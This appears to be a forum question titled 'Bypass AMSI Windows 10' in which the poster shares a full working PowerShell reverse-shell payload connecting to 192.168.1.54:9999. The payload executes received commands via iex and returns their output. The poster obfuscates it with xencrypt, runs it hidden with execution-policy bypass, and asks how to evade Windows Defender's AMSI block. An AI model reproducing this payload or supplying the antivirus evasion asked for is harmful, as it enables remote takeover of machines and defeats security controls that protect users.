Bypass AMSI Windows 10


I’m trying to run a powershell reverse shell on windows 10. Anyway everytime it is blocked by Wndows Defender. How can I bypass it?

In a file I store the payload $ client = New-Object System.Net.Sockets.TCPClient('192.168.1.54',9999);$ stream = $ client.GetStream();[byte[]]$ bytes = 0..65535|%{0};while(($ i = $ stream.Read($ bytes, 0, $ bytes.Length)) -ne 0){;$ data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($ bytes,0, $ i);$ sendback = (iex $ data 2>&1 | Out-String );$ sendback2 = $ sendback + 'PS ' + (pwd).Path + '> ';$ sendbyte = ([text.encoding]::ASCII).GetBytes($ sendback2);$ stream.Write($ sendbyte,0,$ sendbyte.Length);$ stream.Flush()};$ client.Close();

then I use xencrypt (https://github.com/the-xentropy/xencrypt) to obfuscate the code but when I run powershell -NoP -NonI -W Hidden -Exec Bypass .\revshell.ps1

I get Questo script include contenuto dannoso ed รจ stato bloccato dal software antivirus. In riga:18 car:1 + IEX($ piifnga) + ~~~~~~~~~~~~~ + CategoryInfo : ParserError: (:) [Invoke-Expression], ParseException + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand

QUESTION: is there a way to bypass this check?